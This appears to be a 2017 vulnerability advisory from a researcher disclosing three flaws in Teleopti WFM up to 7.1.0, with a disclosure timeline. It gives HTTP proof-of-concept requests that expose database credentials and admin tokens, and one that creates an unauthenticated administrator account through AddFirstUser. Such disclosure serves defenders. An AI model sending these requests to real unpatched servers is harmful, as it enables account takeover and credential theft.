Teleopti WFM 7.1.0 Information Disclosure / Access Controls

`#############################################################  
# Advisory Title: Teleopti WFM (Multiple Vulnerabilities)  
# Date: 2/4/2017  
# Researcher: Graph-X ((email: [email protected]))  
# Vendor Homepage: http://www.teleopti.com  
# Version: <= 7.1.0  
# CVE: is dead  
#############################################################  
Disclosure Timeline  
############################################################################################  
8/30/2016 Initial contact made to alert Teleopti of the flaws  
9/2/2016 Vulnerabilities provided to Teleopti along with POC information  
9/5/2016 Teleopti Confirms they are able to reproduce and are working on  
fixes  
9/13/2016 Teleopti responds confirming patches released  
9/15/2016 Draft of this advisory is provided to Teleopti for comment and  
clarification  
9/16/2016 - Teleopti asks that I not disclose  
2/2/2017 - 5 months have passed since initial disclosure. Informed  
Teleopti of intent to disclose. (No response received).  
2/4/2017 - Public disclosure on twitter and some IRC channels (yeah people  
still use that shit)  
  
2/6/2017 Advisory is published to Full Disclosure and Bug Traq mailing  
lists.  
  
A Comment On Affected Versions:  
These were mainly found while testing version 7.1.0. Additional research  
showed that some of these vulnerabilities were also present in versions  
back to 6.9. I was unable to confirm directly if versions earlier than  
that are vulnerable, but it is strongly suggested that patch levels be  
brought to current just in case.  
  
##############################{Vulnerabilities}#######################################  
1: Server response contains plaintext username and password  
2: Server response contains password hashes and access tokens  
3: Improper Data Validation allowing Administrator account creation (only  
version 7.1.0)  
#################################################################################  
  
Background:  
Teleopti is a leading provider of solutions for strategic Workforce  
Management (WFM) and Telecom Expense Management (TEM).  
  
The company is renowned for developing advanced and user-friendly  
solutions based on client requirements. Hundreds of enterprises around the  
world rely on Teleopti to achieve optimal operational efficiency in their  
contact center in order to provide the highest levels of service to their  
users.  
  
  
  
Researcher's Note:  
I want to sincerely thank Teleopti for being so responsive in fixing the  
vulnerabilities reported. This is the FASTEST I have ever received a) a  
response from a vendor regarding security flaws and  
b) the quickest turn around in providing a solution.  
The development team and management of Teleopti have seriously impressed  
me with the lightning fast response to these vulnerabilities. It was an  
absolute pleasure to coordinate with them on providing a better and more  
secure product. Hats off to Teleopti.  
  
  
###Server Response Contains Plaintext Username and Password###  
  
1) Description  
It is possible for a remote authenticated attacker to retrieve the  
database username and password as well as server hostname/IP address via  
the TeleoptiWFM/Administration section. If an authenticated user makes a  
request to the GetOneTenant page and the server will provide a JSON  
response that contains that tenants database username, password,  
database server name and IP address.  
  
2) Proof of Concept:  
  
1.Send a POST request like the one below:  
POST /TeleoptiWFM/Administration/GetOneTenant HTTP/1.1  
Host: Proof-of-Concept  
Content-Length: 14  
Accept: application/json, text/plain, */*  
Authorization: <Access_Token>  
Content-Type: application/json;charset=UTF-8  
Cookie: <ASP.net session cookie>  
Connection: close  
  
Teleopti WFM" // This is the default tenant name  
  
2. The server will respond similarly to the below snippet:  
HTTP/1.1 200 OK  
Cache-Control: no-cache  
Pragma: no-cache  
Content-Length: 357  
<snip>  
{"Id":1,"Name":"Teleopti  
WFM","AppDatabase":"TELEOPTIAPPDB","AnalyticsDatabase":"TELEOPTIANALYTICSDB","CommandTimeout":60,"UserName":"DatabaseUser","Password":"hunter2","Server":"SQLSERVER","AggregationDatabase":"","Version":{"HeadVersion":710,"ImportAppVersion":710,"AppVersionOk":true,"Error":null},"Active":true,"UseIntegratedSecurity":false}  
  
3) Remediation  
The vendor has issued a patch to address this information disclosure.  
  
###Server Response Contains Password Hashes and Authorization Tokens###  
1) Description  
A remote authenticated attacker can retrieve the usernames, password  
hashes, and authorization tokens for all the administrative users by  
submitting a GET request to /TeleoptiWFM/Administration/Users. The server  
provides a JSON response that includes excessive information such as user  
password and access token.  
2) Proof of Concept  
A remote authenticated attack would be able to trigger this information  
disclosure by sending a GET request to the server like the one below: GET  
/TeleoptiWFM/Administration/Users HTTP/1.1  
Host: someappserver.example.com  
Accept: application/json, text/plain, */*  
  
  
The response would be similar to the below snippet:  
HTTP/1.1 200 OK  
Cache-Control: no-store, must-revalidate, no-cache, private  
Content-Type: application/json; charset=utf-8  
Connection: close  
  
[{"Id":1,"Name":"Teleopti Tenant  
admin","Email":"[email protected]","Password":"******","AccessToken":"********"},{"Id":2,"Name":"joe","Email":"[email protected]","Password":"******","AccessToken":"******"}]  
3) Remediation  
Teleopti has issued a patch to remove the password and access token from  
the server response.  
  
  
###Improper Data Validation Allowing Unauthenticated Admin User  
Creation###  
1) Description  
The TeleoptiWFM/Administration page includes several logical checks  
pertaining to initial user setup and first-time-run. One such check is a  
query to see if an admin user has already been established. This check is  
made when first landing on the Administration page. It appears that a  
client-side validation is made using a Boolean response to a GET request  
to the HasNoUser page with either true or false. An unauthenticated  
remote attacker could manipulate the response from false to true which  
would cause the client to reveal an admin user creation form. The form,  
once submitted, makes no additional server side validations there are  
users in the database already. Additionally, an attacker would be able to  
create an admin user simply by sending a POST request similar to the one  
provided below to the AddFirstUser page.  
2) Proof of Concept  
Sending a POST request to the TeleoptiWFM/Administration/AddFirstUser url  
with information provided by a remote unauthenticated attacker will add a  
new user to the Administration user database. The attacker would then be  
able to login with full admin rights to the administration area.  
POST /TeleoptWFM/Administration/AddFirstUser HTTP/1.1  
Host: proofofconcept.com  
Content-Length: 108  
Accept: application/json, text/plain, */*  
Content-Type: application/json;charset=UTF-8  
  
{"Name":"Admin2","Email":"[email protected]","Password":"hunter2","ConfirmPassword":"hunter12"}  
  
  
  
If the attacker is successful, the server will provide the following JSON  
response:  
  
HTTP/1.1 200 OK  
Content-Type: application/json; charset=utf-8  
Connection: close  
Content-Length: 59  
  
{"Success":true,"Message":"Updated the user successfully."}  
3) Remediation  
Teleopti has released a patch to address this flaw. It should be noted  
that the flaw appears to only exist in version 7.1.0 of the TeleoptiWFM  
software.  
  
  
  
  
--   
Fuck it, let's security! #YOLO  
  
  
  
`